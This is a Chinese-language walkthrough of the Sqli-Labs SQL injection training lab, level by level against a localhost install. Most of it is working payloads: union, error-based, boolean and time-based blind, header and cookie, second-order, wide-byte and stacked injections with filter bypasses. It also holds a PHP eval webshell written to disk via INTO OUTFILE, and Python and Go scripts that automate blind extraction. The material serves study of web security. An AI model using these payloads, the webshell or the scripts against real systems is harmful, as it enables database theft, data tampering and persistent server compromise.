List [CTL]
MYSQL Sql Injection
Sqli-Labs
常用函数
version()——MySQL 版本
user()——数据库用户名
current_user——当前用户名
database()——数据库名
@@datadir——数据库路径
@@version_compile_os——操作系统版本
into outfile——写入文件,select '一句话木马' into outfile "/var/www/html/test.php"
数据库插入语句:insert into [table] values(a,b,c);
删除语句:delete from [table] where id=1;
删除库/表/列:drop database [database]; drop table [table]; alter table [table] drop column [column];
修改:update [table] set [column] = 'abc' where id =1;
concat(str1,str2,…)——无分隔符地连接字符串
concat_ws(separator,str1,str2,…)——含有分隔符地连接字符串
group_concat(group SEPARATOR ';')——连接一组字符串,后可加GROUP BY
extractvalue() 从xml中提取数据
盲注
length()
mid(str,n,m) 从str的第n个数开始提取m个 //与vb的mid()函数相同
substr(str,n,m) 从str的第n个数开始提取m个
left(str,n) 从左开始提取n个 //与vb的left()函数相同
ord() 字符=>ascii //与python的ord()函数相同
ascii() 同ord()
Time-Based
BENCHMARK(count,func())
sleep()
if(a,t,f) //同a?t:f
Wrong-Based
使用group by对rand()函数操作时会返回duplicate key error
rand(int) //以int为种子生成伪随机数
floor() //向下取整
count() //统计个数
and extractvalue(1, concat(0x25, (select table_name from information_schema.tables limit 1)));
and 1=(updatexml(1,concat(0x25,(select user())),1))
and(select 1 from(select count(),concat((select (select (select concat(0x25,(select username from users where id=1),0x25))) from information_schema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)#
and select * from(select * from table a join table b)as c
select ST_LatFromGeoHash((select group_concat(flag) from flag));
正则注入
Mysql中的RE和大多数编程语言中的相同,不赘述
select user() regexp '^[a-z]'
匹配时返回1,不匹配时返回0
select * from * where id =1 and 1=(user() regexp '^[a-z]{4}')
regexp可替换为like
操作文件
and (select count(*) from mysql.user)>0
//返回正常说明有读取权限
select * INTO OUTFILE 'file_name'
//写入文件,目标文件不能已存在;此外写文件需要FILE权限,且目标目录受secure_file_priv设置限制(设为NULL时完全禁止导入导出)
爆数据库 select schema_name from information_schema.schemata
爆某库的数据表 select table_name from information_schema.tables where table_schema='xxxxx'
爆某表的所有列 select column_name from information_schema.columns where table_name='xxxxx'
获取某列的内容 select xx_column from xx_table
列出所有的数据库 select group_concat(schema_name) from information_schema.schemata
列出某个库当中所有的表 select group_concat(table_name) from information_schema.tables where table_schema='xxxxx'
系统数据库——information_schema,包含所有数据库相关信息
information_schema.schemata中schema_name列,字段为所有库名
information_schema.tables中table_name列对应数据库所有表名,与table_schema列对应
information_schema.columns同理,column_name与table_schema和table_name对应
Less-1
首先页面提示 Please input the ID as parameter with numeric value,参数以查询字符串 id 的形式提交
id=1闭合单引号报错You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
添加注释后使用 order by 查列数,此处 order by 的语法为 ORDER BY column1 [ASC|DESC], column2 [ASC|DESC],...,用于指定以某一列为 key 进行排序,通过逐个尝试可以得出列数。这里经尝试为 3 列
接着进行联合注入,通过回显爆出表名,列名,字段。这里查询时需要将id查询结果限定为空集,第二个查询结果才能显示出来
爆数据库 http://localhost/sqli/less-1/?id=-1' union select 1,group_concat(schema_name),concat_ws(';',schema_name) from information_schema.schemata--+
爆当前security数据库的表 http://localhost/sqli/less-1/?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+
爆user表的列 http://127.0.0.1/sqli/less-1/?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+
爆数据 http://127.0.0.1/sqli/less-1/?id=-1' union select 1,concat_ws(';',username,password),3 from users where id=1--+
Less-2
在查询字符串id值设为1
接着添加单引号,报错为You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 0,1' at line 1
可知单引号影响了闭合,为传入整数查询
后续注入内容与Less-1相同:表-列-值
Less-3
查询id=1,加单引号,报错为syntax to use near ''1'') LIMIT 0,1' at line 1
,猜测后台查询语句为select * from * where id = ('$id') LIMIT 0,1
接着只需构造payload为http://127.0.0.1/sqli/less-3/?id=-1') union select 1,database(),3--+
,后续注入同Less-1和Less-2
Less-4
提交id=1,添加单引号页面正常,添加双引号报错为syntax to use near '"1"") LIMIT 0,1' at line 1
,猜测后台查询语句为select * from * where id = ("$id") LIMIT 0,1
构造payload为http://127.0.0.1/sqli/less-3/?id=-1") union select 1,database(),3--+
,后续注入同上
Less-5
提交id=1,页面仅显示u are in,没有数据回显,可知需要盲注
加单引号报错,知闭合为单引号
接下来可以构造payload进行基于bool的盲注
http://127.0.0.1/sqli/less-5/?id=1' and mid(database(),1,1)='s'--+
,库名security第一位为’s’,假如猜错则会无回显
慢慢试吧,写个脚本更方便
Bool-Based http://127.0.0.1/sqli/less-5/?id=1' and mid((select group_concat(schema_name) from information_schema.schemata),1,1)>'b'--+
http://127.0.0.1/sqli/less-5/?id=1' and mid((select table_name from information_schema.tables where table_schema='security' LIMIT 0,1),1,1)>'b'--+
http://127.0.0.1/sqli/less-5/?id=1' and mid((select column_name from information_schema.columns where table_name='users' LIMIT 0,1),1,1)>'b'--+
http://127.0.0.1/sqli/less-5/?id=1' and mid((select(username) from security.users where id=1),1,1)>'b'--+
Wrong-Based http://127.0.0.1/sqli/less-5/?id=1' and(select 1 from(select count(*),concat((select (select (select concat(0x25,version(),0x25))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
http://127.0.0.1/sqli/less-5/?id=1' union select 1,count(*),concat(0x25,database(),0x25,floor(rand(0)*2))a from information_schema.tables group by a--+
http://127.0.0.1/sqli/less-5/?id=1' union select 1,count(*),concat(0x25,(select schema_name from information_schema.schemata limit 0,1),0x25,floor(rand(0)*2))a from information_schema.schemata group by a--+
http://127.0.0.1/sqli/less-5/?id=1' union select 1,count(*),concat(0x25,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x25,floor(rand(0)*2))a from information_schema.tables group by a--+
这里修改LIMIT n,1即可遍历
Time-Based http://127.0.0.1/sqli/less-5/?id=1' and if(ascii(mid(database(),1,1))=96,1,sleep(5))--+
http://127.0.0.1/sqli/less-5/?id=1' and if((ascii(mid((select schema_name from information_schema.schemata limit 0,1),1,1))=ascii('i')),1,sleep(5))--+
Less-6
上一关的单引号改为双引号闭合,其余完全相同,采用延时注入
http://127.0.0.1/sqli/less-6/?id=1" and if(ascii(mid((select schema_name from information_schema.schemata limit 0,1),1,1))=ascii('i'),1,sleep(5))--+
http://127.0.0.1/sqli/less-6/?id=1" and if(ascii(mid((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=ascii('e'),1,sleep(5))--+
http://127.0.0.1/sqli/less-6/?id=1" and if(ascii(mid((select column_name from information_schema.columns where table_name='users' limit 1,1),1,1))=ascii('u'),1,sleep(5))--+
http://127.0.0.1/sqli/less-6/?id=1" and if(ascii(mid((select concat(username,0x25,password) from users where id=1 limit 0,1),1,1))=ascii('D'),1,sleep(5))--+
http://127.0.0.1/sqli/less-6/?id=1" and if(ascii(mid((select concat(username,0x25,password) from users where id=1 limit 0,1),5,1))=ascii('%'),1,sleep(5))--+
Less-7
首先判断参数提交为((‘$id’)),接着提示需要use outfile
http://127.0.0.1/sqli/less-7/?id=1 and (select count(*) from mysql.user)>0--+
返回正常,说明有写入权限(严格来说只能说明当前用户能读mysql.user,即权限较高;实际能否用into outfile写文件还取决于FILE权限和secure_file_priv的设置)
查询列 http://127.0.0.1/sqli/less-7/?id=1')) union select 1,2,(username from users where id=1) into outfile "D:\\phpStudy\\WWW\\sqli\\Less-7\\qqq.php"--+
读取文件并写入 http://127.0.0.1/sqli/less-7/?id=1')) union select 1,2,load_file('D:\\phpStudy\\WWW\\phpinfo.php') into outfile "D:\\phpStudy\\WWW\\sqli\\Less-7\\aaa.txt"
写入webshell,拿菜刀连接 http://127.0.0.1/sqli/less-7/?id=1')) union select 1,2,'<?php eval($_POST["dump"]) ?>' into outfile "D:\\phpStudy\\WWW\\sqli\\Less-7\\qqq.php"--+
Less-8
提交?id=' or 1=1--+
,知为单引号闭合
多说一点,我发现Mysql或者是后端php中,认为两个单引号等同于一个双引号,这里提交?id="' or 1=1--+
也会返回正常
知道如何闭合后采取延时注入或布尔注入就可以了,报错注入这一关源码中设置不回显报错
http://127.0.0.1/sqli/less-8/?id=1' and ascii(mid((select password from users where id=1),1,1))=ascii('a')--+
Less-9
页面标题,延时注入,单引号闭合
不太能理解这源码闭合的问题,这里单引号双引号闭合都不会报错。但在注入时双引号返回错误
http://127.0.0.1/sqli/less-9/?id=1' and if(ascii(mid((select password from users where id=1),1,1))=ascii('a'),sleep(5),1)--+
Less-10
页面标题,延时,双引号
http://127.0.0.1/sqli/less-10/?id=1" and if(ascii(mid((select password from users where id=1),1,1))=ascii('a'),sleep(5),1)--+
Less-11
这一关为post注入,查看源代码 @$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
构造万能语句 admin' or '1'='1
,密码随意填写,可看到登录成功
或者admin' and 1=1#
只需要注意这里要使用#注释
Less-12
闭合为(“$user”),故构造payload为admin") or 1=1#
Less-13
闭合为(‘$user’),payload:admin') or 1=1#
Less-14
闭合为”$id”,payload:admin" or 1=1#
当然也可以进行盲注
Less-15
本关发现加单引号或双引号都没有报错回显,说明只能靠猜了
uname=admin' and mid(database(),1,8)='security'#&passwd=a&submit=Submit
uname=admin' and mid((select password from security.users where id=1),1,1)='a'#&passwd=a&submit=Submit
Less-16
页面标题提示为Time-Based
一样没有报错回显,经测试为(“$id”)闭合
构造payload:uname=admin") and if(ascii(mid((select username from security.users where id=1),1,1))=ascii('D'),sleep(5),1)#&passwd=a&submit=Submit
Less-17
进入页面提示为PASSWORD RESET,为重置密码界面,从密码框尝试注入
这里对于username表单进行了过滤:
/**
 * Normalise one form field before it is interpolated into SQL.
 *
 * Non-empty input is first cut to 15 characters, magic-quotes escaping is
 * undone so the value is escaped exactly once, and the result is either an
 * integer (digit-only input) or a single-quoted, escaped string.
 *
 * NOTE(review): mysql_real_escape_string() belongs to the mysql extension
 * removed in PHP 7.0 and needs an open connection; get_magic_quotes_gpc()
 * was removed in PHP 8.0. Escaping-and-quoting is also weaker than a
 * prepared statement with bound parameters, which is the current fix.
 *
 * @param mixed $value raw form value
 * @return int|string  integer, or quoted escaped string ready for SQL
 */
function check_input($value)
{
    // Cap the raw value before escaping so the escaped form is never cut mid-escape.
    if (!empty($value)) {
        $value = substr($value, 0, 15);
    }

    // With magic quotes on, the input is already backslash-escaped; strip that
    // layer so the escaping below is not applied twice.
    if (get_magic_quotes_gpc()) {
        $value = stripslashes($value);
    }

    // Digit-only input becomes an integer; anything else is escaped and quoted.
    return ctype_digit($value)
        ? intval($value)
        : "'" . mysql_real_escape_string($value) . "'";
}
为单引号闭合
提交的sql语句为@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";
$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
这一关注入时不能对users表进行查询,不然会报You can't specify target table 'users' for update in FROM clause错误,原因是MySQL不允许在同一条语句中对正在被update的表做子查询select
所以这个语句会报错uname=admin&passwd=a' and if(mid((select username from users where id=1),1,1)='D',sleep(5),1)#&submit=Submit
而且我发现提交payload上去本地服务器就挂掉了,且user表中password列都被修改为0,记下这个坑。而且这里的问题会影响后面的请求头注入,US,cookie之类的无法echo到页面,需要初始化数据库
采用报错注入
uname=admin&passwd=11'and(select 1 from(select count(*),concat((select (select (select concat(0x25,(select username from users where id=1),0x25))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#&submit=Submit
Less-18
进入页面看见显示了IP ADDR,知需要http header注入,使用BurpSuite修改请求头
使用extractvalue函数进行报错注入,针对UA进行注入,按理修改X-Forwarded-For也可以注入,但这一关作者好像只希望通过UA注入
'and(select 1 from(select count(*),concat((select (select (select concat(0x25,(select username from users where id=1),0x25))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
Less-19
这一关修改referer,说到referer,据说当时修订http协议的那人拼错了单词,然后就将错就错一直拼成referer….
'and(select 1 from(select count(*),concat((select (select (select concat(0x25,(select username from users where id=1),0x25))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
`
Less-20
看页面标题为Cookie注入
Burp修改Cookie为uname=admin'and(select 1 from(select count(*),concat((select (select (select concat(0x25,(select username from users where id=1),0x25))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#
Less-21
这关对payload进行了b64编码,且闭合为(‘$uname’)
uname=admin'and(select 1 from(select count(*),concat((select (select (select concat(0x25,(select username from users where id=1),0x25))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#
uname=YWRtaW4nYW5kKHNlbGVjdCAxIGZyb20oc2VsZWN0IGNvdW50KCopLGNvbmNhdCgoc2VsZWN0IChzZWxlY3QgKHNlbGVjdCBjb25jYXQoMHgyNSwoc2VsZWN0IHVzZXJuYW1lIGZyb20gdXNlcnMgd2hlcmUgaWQ9MSksMHgyNSkpKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgbGltaXQgMCwxKSxmbG9vcihyYW5kKDApKjIpKXggZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIGdyb3VwIGJ5IHgpYSkj
Less-22
同Less-21,闭合改为”$uname”
Less-23
单引号闭合,过滤了注释符
通过联合查询语句闭合单引号构造payload
http://127.0.0.1/sqli/less-23/?id=-1' union select 1,(select group_concat(schema_name) from information_schema.schemata),'3
http://127.0.0.1/sqli/less-23/?id=-1' union select 1,(select username from security.users where id=2),'3
Less-24
这一关index页面为注册账号并登录
通过查看pass_change.php
的源码,登录后修改密码的sql语句为: $sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";
通过注册用户名为admin'#
的账号,修改密码时sql语句会变成: $sql = "UPDATE users SET PASSWORD='123' where username='admin'#' and password='$curr_pass' ";
sql语句执行后,admin账户密码被修改。这是典型的二次注入:注册时用户名被原样存入数据库,修改密码时又被直接拼接进SQL;根本的防护是使用参数化查询而不是拼接字符串
Less-25
可知过滤掉了or && and
http://127.0.0.1/sqli/less-25/?id=-1' union select 1,database(),3--+
如何绕过字符过滤:
- 编码
&&和 - 内联注释/**/
- 重复写入
其实这一关直接联合查询是不需要管转义的
http://127.0.0.1/sqli/less-25/?id=-1' union select 1,(select passwoorrd from users where id=2),3--+
因为password中的or被过滤,所以需写为passwoorrd
报错注入使用extractvalue
http://127.0.0.1/sqli/less-25/?id=1' || extractvalue(1,concat(0x25,(select passwoorrd from users where id=1)))--+
Less-25a
这一关id为加引号,同Less-25
http://127.0.0.1/sqli/less-25a/?id=-1 union select 1,(select passwoorrd from users where id=2),3--+
Less-26
这一关为过滤空格与注释,而且前一关的and && or也被过滤
用以下方式绕过:

|Hex|含义|
|---|---|
|%09|TAB 键(水平)|
|%0a|新建一行|
|%0c|新的一页|
|%0d|return 功能|
|%0b|TAB 键(垂直)|
|%a0|空格|
http://127.0.0.1/sqli/less-26/?id=1'%0aunion%0aselect%0a1,database(),'3
Less-26a
同上一关,闭合为(‘$id’)
Less-27
这一关过滤了union和select加上前一关的字符
http://127.0.0.1/sqli/less-27/?id=0'%0aununionion%0aseLect%0a1,(seLect%0apassword%0afrom%0ausers%0awhere%0aid=2),'3
Less-27a
闭合改为(“$id”)
Less-28
跟前面基本没区别,闭合为(‘$id’)
Less-28a
同上
Less-29
没看懂哪里有WAF,可能是我本地配置有问题
http://127.0.0.1/sqli/less-29/?id=0' union select 1,(select password from users where id=3),3--+
看别人的wp是需要参数污染,提交两个id,提供反向代理的服务器解析第一个id,提供web服务的服务器解析第二个,WAF过滤只处理第一个参数
Less-30
同上
http://127.0.0.1/sqli/less-30/?id=0" union select 1,user(),3--+
Less-31
http://127.0.0.1/sqli/less-31/?id=0") union select 1,(select password from users where id=3),3--+
Less-32
这一关开始是宽字节注入
所谓宽字节就是用两个以上字节表示的,如utf-8编码和GBK编码,不同于ascii的一个字节0-128。在对引号进行过滤时,会添加转义符,urlencode为%5c%27,此时添加%df,%df%5c组成unicode汉字
http://127.0.0.1/sqli/less-32/?id=0%df%27 union select 1,database(),3--+
Less-33
跟上一关一模一样
http://127.0.0.1/sqli/less-32/?id=0%df%27 union select 1,database(),3--+
Less-34
post注入,经尝试uname和passwd都存在单引号过滤。post注入中无法使用URL Encoding的方式绕过,这里使用单引号的utf-16/utf-32编码绕过
uname=� ' or 1=1#&passwd=1
Less-35
id并未被闭合,不需要考虑引号过滤
http://127.0.0.1/sqli/less-35/?id=0 union select 1,database(),3--+
Less-36
单引号闭合 http://127.0.0.1/sqli/Less-36/?id=-1%df%27 union select 1,user(),3--+
Less-37
同34关
uname=� ' or 1=1#&passwd=1
Less-38
堆叠注入stacked-injection
注入多条Sql语句,分号分割,同C语言单行多条语句
payload: http://127.0.0.1/sqli/Less-38/?id=1';insert into users(id,username,password) values('40','Ivan','Ivan')--+
还可以进行drop database,update password等操作
Less-39
同上一关,id不闭合
http://127.0.0.1/sqli/Less-38/?id=1;insert into users(id,username,password) values('40','Ivan','Ivan')--+
Less-40
(‘$id’)闭合
http://127.0.0.1/sqli/Less-38/?id=1');insert into users(id,username,password) values('40','Ivan','Ivan')--+
Less-41
同Less-39,id不闭合,无错误回显
Less-42
post注入,查看源码发现uname进行了过滤,故对passwd进行注入
passwd: a';create table ooo like users;
Less-43
同Less-42,闭合为(‘$id’)
Less-44
单引号闭合,无报错回显,同Less-42
Less-45
同Less-43,无报错回显
Less-46
order by注入
参数提交?sort=1 desc/?sort=1 asc,如果返回结果不同则可以进行注入。rand(true)与rand(false)返回结果不同,可以进行基于布尔的注入。还可以?sort=1 and [payload]进行报错注入或延时注入
报错注入payload: http://127.0.0.1/sqli/Less-46/?sort=1 and extractvalue(1,concat(0x25,(select password from users where id=3)))
Less-47
sort参数变为字符型,前闭合后注释就ok
http://127.0.0.1/sqli/Less-47/?sort=1' and extractvalue(1,concat(0x25,(select password from users where id=3)))--+
Less-48
这一关无报错回显,使用延时注入
http://127.0.0.1/sqli/Less-48/?sort=1 and if(mid(database(),1,1)='s',sleep(5),1)--+
Less-49
同Less-47,无报错回显,延时注入
http://127.0.0.1/sqli/Less-49/?sort=1' and if(mid(database(),1,1)='s',sleep(5),1)--+
Less-50
order by注入与堆叠注入
http://127.0.0.1/sqli/Less-50/?sort=1;create table aaa like users
Less-51
同上,单引号闭合
http://127.0.0.1/sqli/Less-50/?sort=1';create table aaa like users--+
Less-52
同Less-50,payload完全相同
Less-53
同Less-51,payload完全相同
Less-54
从这一关开始进行实战注入,限制十次尝试机会,且每次的表名列名字段名随机
payload依次为:
http://127.0.0.1/sqli/less-54/index.php?id=1'
http://127.0.0.1/sqli/less-54/index.php?id=1' order by 3--+
http://127.0.0.1/sqli/less-54/index.php?id=1' order by 4--+
http://127.0.0.1/sqli/less-54/index.php?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='CHALLENGES'--+
爆出表名为p08ie9rpnc
http://127.0.0.1/sqli/less-54/index.php?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='p08ie9rpnc'--+
爆出列名为id,sessid,secret_1A88,tryy
http://127.0.0.1/sqli/less-54/index.php?id=-1' union select 1,group_concat(secret_1A88),3 from p08ie9rpnc--+
爆出secret key并提交YsQHctIhjx2pxHXeva7di5dj
英语不好是真惨,看不懂上面的字还以为红色是注入失败了…
Less-55
闭合为($id),猜闭合就会花很多次
http://127.0.0.1/sqli/less-55/?id=0) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='CHALLENGES'--+
http://127.0.0.1/sqli/less-55/?id=0) union select 1,group_concat(column_name),3 from information_schema.columns where table_name='zyx0hgi9h3'--+
http://127.0.0.1/sqli/less-55/?id=0) union select 1,group_concat(secret_72LK),3 from zyx0hgi9h3--+
Less-56
闭合为(‘$id’)
http://127.0.0.1/sqli/less-56/?id=0') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='CHALLENGES'--+
http://127.0.0.1/sqli/less-56/?id=0') union select 1,group_concat(column_name),3 from information_schema.columns where table_name='go1rv0brdo'--+
http://127.0.0.1/sqli/less-56/?id=0') union select 1,group_concat(secret_LJOZ),3 from go1rv0brdo--+
Less-57
双引号闭合
http://127.0.0.1/sqli/less-57/?id=0" union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='CHALLENGES'--+
http://127.0.0.1/sqli/less-57/?id=0" union select 1,group_concat(column_name),3 from information_schema.columns where table_name='hxf6ijm27v'--+
http://127.0.0.1/sqli/less-57/?id=0" union select 1,group_concat(secret_T011),3 from hxf6ijm27v--+
Less-58
联合查询无回显,且限制次数只有五次,需要报错注入
http://127.0.0.1/sqli/less-58/?id=1' and extractvalue(1,concat(0x25,(select table_name from information_schema.tables where table_schema='CHALLENGES'),0x25))--+
http://127.0.0.1/sqli/less-58/?id=1' and extractvalue(1,concat(0x25,(select column_name from information_schema.columns where table_name='pg5r7v7b4r' limit 2,1),0x25))--+
http://127.0.0.1/sqli/less-58/?id=1' and extractvalue(1,concat(0x25,(select secret_LQOC from pg5r7v7b4r),0x25))--+
Less-59
id无闭合,同上一关
http://127.0.0.1/sqli/less-59/?id=1 and extractvalue(1,concat(0x25,(select table_name from information_schema.tables where table_schema='CHALLENGES')))--+
http://127.0.0.1/sqli/less-59/?id=1 and extractvalue(1,concat(0x25,(select column_name from information_schema.columns where table_name='sd9a8g0soe' limit 2,1),0x25))--+
http://127.0.0.1/sqli/less-59/?id=1 and extractvalue(1,concat(0x25,(select secret_DVPW from sd9a8g0soe),0x25))--+
Less-60
(“$id”)闭合
http://127.0.0.1/sqli/less-60/?id=1") and extractvalue(1,concat(0x25,(select table_name from information_schema.tables where table_schema='CHALLENGES'),0x25))--+
http://127.0.0.1/sqli/less-60/?id=1") and extractvalue(1,concat(0x25,(select column_name from information_schema.columns where table_name='xo7c1hm38d' limit 2,1),0x25))--+
http://127.0.0.1/sqli/less-60/?id=1 and extractvalue(1,concat(0x25,(select secret_YJII from xo7c1hm38d),0x25))--+
Less-61
闭合为((‘$id’))
http://127.0.0.1/sqli/less-61/?id=1')) and extractvalue(1,concat(0x25,(select table_name from information_schema.tables where table_schema='CHALLENGES'),0x25))--+
http://127.0.0.1/sqli/less-61/?id=1')) and extractvalue(1,concat(0x25,(select column_name from information_schema.columns where table_name='gfmtwwxgwf'),0x25))
http://127.0.0.1/sqli/less-61/?id=1')) and extractvalue(1,concat(0x25,(select secret_4KX6 from gfmtwwxgwf),0x25))--+
Less-62
看到这个次数我是绝望的
进行延时注入:
脚本:
# NOTE(review): Python 2 script (string.lowercase and the print statement are
# Python 2 only); depends on the third-party `requests` package.
import requests,string
# Candidate alphabet for each character of the table name: a-z then 0-9.
payload = string.lowercase+string.digits
lenth = 0
result = ''
# Step 1: find the length of the table name. Each probe asks the server to
# sleep(5) when the length equals i while the client gives up after 5 s, so a
# timeout -- or any other exception, the except clause is bare -- from
# requests.get is taken to mean "length == i". If no probe raises, lenth stays
# 0 and the extraction loop below never runs.
for i in range(1,15):
    try:
        url = "http://127.0.0.1/sqli/less-62/?id=1') and if(length((select table_name from information_schema.tables where table_schema='CHALLENGES'))='"+str(i)+"',sleep(5),1)--+"
        r = requests.get(url, timeout=5)
    except:
        lenth = i
        break
# Step 2: recover the name one position at a time with the same timing oracle.
# Only a raised exception appends a character; a position where no candidate
# raises is silently skipped, so result can come out shorter than lenth.
# Detection note: every probe carries if(...) and sleep(5) inside the id
# parameter, and the probes arrive in bursts of one request per candidate.
for i in range(1, lenth+1):
    for j in payload:
        try:
            url = "http://127.0.0.1/sqli/less-62/?id=1') and if(mid((select table_name from information_schema.tables where table_schema='CHALLENGES'),"+str(i)+",1)='"+str(j)+"',sleep(5),1)--+"
            r = requests.get(url,timeout=5)
        except:
            result += str(j)
            break
print result
Golang时间盲注:
利用goroutine来快速注入
// Time-based extraction of `select flag from flag`: one goroutine per
// character position, with the current state printed once a second.
package main

import (
	"fmt"
	"time"
	"github.com/eddieivan01/nic" // third-party HTTP client providing nic.Get and nic.H
)

// flag holds the recovered bytes by position (index = position - 1). It is
// written by the worker goroutines and read by display() without any
// synchronization.
var flag = [32]byte{}

// display prints the current contents of flag every second and never returns.
func display() {
	for {
		time.Sleep(time.Duration(1) * time.Second)
		fmt.Println(string(flag[:]))
	}
}

// main starts one goroutine for each position 1..29. Each goroutine tries the
// candidate bytes in order; the server is asked to sleep(3) on a match and the
// request is given a Timeout of 3 (presumably seconds -- depends on nic.H), so
// the first request that returns an error is treated as the match, stored at
// flag[i-1], and the goroutine exits. A position where no request errors keeps
// its zero byte. main then blocks in display() forever.
func main() {
	payload := `select flag from flag`
	// NOTE(review): url is a single variable captured by every goroutine and
	// overwritten concurrently -- a data race. Another goroutine may replace
	// url between the Sprintf and the nic.Get call, so a worker can send a
	// probe for a different position than the one it records the result for.
	var url string
	for i := 1; i < 30; i++ {
		go func(i int) {
			for _, j := range []byte("{}qwertyuioplkjhgfdsazxcvbnm098764321_") {
				url = fmt.Sprintf("http://127.0.0.1/sqli/Less-1/?id=1' and if(mid((%s),%d,1)='%v',sleep(3),0)-- -", payload, i, string(j))
				_, err := nic.Get(url, &nic.H{
					Timeout: 3,
				})
				// Any error (not only a timeout) is taken as "this byte matched".
				if err != nil {
					flag[i-1] = byte(j)
					return
				}
			}
		}(i)
	}
	display()
}
λ go run time-based.go
{
{
{ }
{ q }
{ q }
{ q e e e}
{ q e e e}
{ q e t e e}
{ q e t e e}
{ q e t e e}
{ q i e ti e e}
{ q i e tio e e}
{ q i e tio e e}
l { ql i e tio lle e}
l { ql i e tio lle e}
l { ql i je tio lle e}
l { ql i je tio h lle e}
l g{ ql i je tio h lle ge}
fl g{ ql i je tio h lle ge}
fl g{ ql i je tio h lle ge}
fl g{sql i je tio h lle ge}
flag{sql i je tio halle ge}
flag{sql i je tio halle ge}
flag{sql i je tio halle ge}
flag{sql i jectio challe ge}
flag{sql i jectio challe ge}
flag{sql i jectio challe ge}
flag{sql injection challenge}
flag{sql injection challenge}
flag{sql injection challenge}
flag{sql injection challenge}
flag{sql injection challenge}
flag{sql injection challenge}
flag{sql injection challenge}
flag{sql injection challenge}
flag{sql injection challenge}
flag{sql injection challenge}
flag{sql injection challenge}
flag{sql_injection_challenge}
flag{sql_injection_challenge}
Less-63
单引号闭合,同上关脚本
Less-64
(“$id”)闭合,同上上关脚本
前前后后花了大概半个月刷完了sqli-labs,对于Mysql数据库的注入算初窥门径,对于MSSql,Oracle或是MongoDB等nosql型数据库还需学习积累经验。继续学习吧!